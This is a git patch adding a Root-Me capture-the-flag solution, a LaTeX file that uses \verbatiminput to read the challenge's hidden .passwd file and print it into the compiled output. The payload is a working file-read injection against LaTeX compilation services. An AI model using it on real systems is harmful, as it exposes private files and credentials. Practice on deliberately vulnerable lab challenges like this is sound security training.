From c9c50cf5c8e8f9cff794aff5fa089291b7f4e69a Mon Sep 17 00:00:00 2001 From: valentin Date: Fri, 24 Dec 2021 01:26:23 +0100 Subject: [PATCH] Ajout challenge Root-Me --- rootme/challenges/app - script/LaTeX - Input/exploit.tex | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 rootme/challenges/app - script/LaTeX - Input/exploit.tex diff --git a/rootme/challenges/app - script/LaTeX - Input/exploit.tex b/rootme/challenges/app - script/LaTeX - Input/exploit.tex new file mode 100644 index 0000000..5f83183 --- /dev/null +++ b/rootme/challenges/app - script/LaTeX - Input/exploit.tex @@ -0,0 +1,7 @@ +\documentclass{article} +\usepackage{verbatim} + +\begin{document} +passwd : +\verbatiminput{/challenge/app-script/ch23/.passwd} +\end{document}